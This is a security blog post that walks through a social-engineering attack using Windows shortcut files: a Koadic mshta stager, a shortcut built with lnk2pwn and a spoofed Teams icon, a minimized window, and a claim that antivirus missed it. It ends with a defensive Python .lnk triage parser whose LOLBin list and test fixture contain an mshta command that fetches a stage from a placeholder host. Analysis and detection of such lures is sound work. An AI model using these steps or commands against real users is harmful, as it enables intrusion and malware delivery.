Pwning with shortcuts: Abusing the Windows LNK feature to get a foothold

Shaquib Izhar
4 min read · Feb 17, 2022

On Windows, .lnk is the extension of shortcut files. Windows creates a shortcut that points to an actual file and runs that application. In this post we will see how a threat actor can abuse the Windows LNK feature, combined with a social engineering trick, to make someone run a malicious application.

What this post is about

This post describes a social engineering attack in which an attacker uses a malicious shortcut file with a spoofed extension (using a Unicode character) and a fake icon. Shortcut files can be combined with living-off-the-land techniques, which can help bypass Defender.

What this post is not about

This post will only show the initial access part, where an attacker gains access to the victim machine using very basic techniques. The next post will show evading most antivirus and detection products.

Preparing the Attack

For this attack I am going to use Koadic, a COM-based command and control framework. Koadic can deliver the payload directly into memory from stage 0 using living-off-the-land techniques, which can help us bypass basic detection.

I am going to select the mshta technique for the stager by typing use stager/js/mshta

Next, I set the ENDPOINT to trusted, which will be the payload name.

Now I run the payload.

Our attacker machine is now ready to serve the payload.

Preparing malicious shortcut file

You can create a malicious shortcut file manually, but to automate things a little I am going to use lnk2pwn.

After running lnk2pwn, this is what we get on screen.

Download the .ico file you want to use for spoofing the icon; I am using the Microsoft Teams app icon for this. Alternatively, install the program and load the icon from its installed location.

Now, in lnk2pwn, use the following settings:

1. Put your malicious command here; try to use a LOLBIN method.

2. Set the location of your .ico file. Make sure you are spoofing an icon from installed software (for example, choose the icon from the Program Files or System32 directory); otherwise the icon will not load on the victim system. I am using a downloaded icon just for the demo.

3. Select the minimize option, as this will run the command prompt minimized.

4. Select your fake extension. I am leaving it blank because I want to keep it a .lnk file.

5. Click the Generate button and choose the location where the malicious shortcut file will be saved.

Our shortcut file is ready to deliver.

I tested this shortcut file on our victim machine with an updated version of Quick Heal, and it was not able to detect the file.

Finally, I executed the file, and it ran the mshta command inside the minimized command prompt.

And I got a shell on my Kali machine.

Analyzing malicious lnk file

You can use exiftool to inspect a malicious .lnk file, but LECmd by Eric Zimmerman does a better job of parsing it, as shown below.
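The structure LECmd walks is documented in the MS-SHLLINK specification, and a responder can reproduce the parts that matter for triage in a few dozen lines. What follows is an added example, not code from this post, from LECmd or from lnk2pwn: a minimal Python parser that reads the ShowCommand from the header and the StringData fields (name, relative path, working directory, arguments, icon location), then applies the heuristics a shortcut built the way this post describes would trip (a LOLBin target, mshta and a URL in the arguments, a minimized window, an icon borrowed from another program). It also includes a filename check for the right-to-left override character that the extension-spoofing trick relies on; the post does not name the character, and U+202E is the usual one. The fixture bytes, the c2.example URL and the Teams paths are constructed placeholders.

```python
"""Minimal .lnk triage parser: a hypothetical defender's example, not LECmd,
exiftool or lnk2pwn. Layout per MS-SHLLINK: 76-byte ShellLinkHeader, optional
LinkTargetIDList and LinkInfo blocks, then the StringData fields."""
import re
import struct
import uuid

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1) and the ShowCommand value for "minimized"
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE, SW_SHOWMINNOACTIVE = 0x40, 0x80, 0x7
# Living-off-the-land binaries commonly launched from abused shortcuts
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "certutil.exe", "regsvr32.exe"}


def _read_string(data, offset, unicode):
    """One StringData entry: 2-byte char count, then the chars (no NUL)."""
    (count,) = struct.unpack_from("<H", data, offset)
    start, end = offset + 2, offset + 2 + count * (2 if unicode else 1)
    text = data[start:end].decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return text, end


def parse_lnk(data):
    """Return ShowCommand plus the StringData fields of a Shell Link."""
    header_size, clsid_raw, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or uuid.UUID(bytes_le=clsid_raw) != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_command,) = struct.unpack_from("<I", data, 0x3C)  # ShowCommand lives at 0x3C
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDList: 2-byte size + items
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:            # skip LinkInfo: 4-byte size includes itself
        offset += struct.unpack_from("<I", data, offset)[0]
    fields = {"show_command": show_command}
    for key, flag in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        fields[key] = ""
        if flags & flag:
            fields[key], offset = _read_string(data, offset, bool(flags & IS_UNICODE))
    return fields


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(fields):
    """Heuristic findings a responder would want to see for one shortcut."""
    findings, args = [], fields["arguments"].lower()
    target = _basename(fields["relative_path"])
    if target in LOLBINS:
        findings.append(f"target is a LOLBin: {target}")
    for tok in re.split(r'[\s"\',;&|/]+', args):   # e.g. "mshta" inside "cmd /c mshta ..."
        tok = _basename(tok)
        if tok and (tok in LOLBINS or tok + ".exe" in LOLBINS):
            findings.append(f"arguments invoke {tok}")
    if "http://" in args or "https://" in args:
        findings.append("arguments contain a URL (remote stage)")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    icon = _basename(fields["icon_location"])
    if icon.endswith(".exe") and target and icon != target:  # Teams icon, cmd target
        findings.append(f"icon borrowed from another program: {icon}")
    return findings


def suspicious_filename(name):
    """Flag bidi controls (RLO U+202E and friends) or a fake extension before .lnk."""
    return bool(re.search("[\u202a-\u202e\u2066-\u2069]", name)
                or re.search(r"\.\w{2,4}\.lnk$", name, re.I))


def constructed_fixture():
    """Constructed test bytes, not a real sample: the shape the post describes
    (Teams icon, minimized cmd window, mshta stager) with placeholder values."""
    def s(text):  # StringData encoder for IsUnicode links
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    flags = (HAS_NAME | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID.bytes_le, flags)
    header += struct.pack("<I", 0x20) + b"\x00" * 24        # FileAttributes, 3 FILETIMEs
    header += struct.pack("<III", 0, 0, SW_SHOWMINNOACTIVE)  # FileSize, IconIndex, ShowCommand
    header += b"\x00" * 12                                  # HotKey, Reserved1..3
    return (header + s("Microsoft Teams") + s("..\\..\\..\\Windows\\System32\\cmd.exe")
            + s("C:\\Windows\\System32") + s("/c mshta http://c2.example/trusted")
            + s("C:\\Program Files\\Microsoft Teams\\Teams.exe"))


if __name__ == "__main__":
    fields = parse_lnk(constructed_fixture())
    print(fields)
    print("\n".join(" - " + f for f in triage(fields)))
```

The LinkTargetIDList and LinkInfo blocks are skipped rather than decoded, so a shortcut whose real target is stored only in the IDList (with no RelativePath string) shows an empty relative_path here; LECmd resolves those cases. Windows Explorer never displays the .lnk extension regardless of the folder view settings, which is why the visible name and icon alone cannot be trusted and the fields above are what a triage should look at.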

Final words

This was a very basic method of abusing the LNK feature. In my next post we will see how this method can help an attacker bypass some popular AVs.
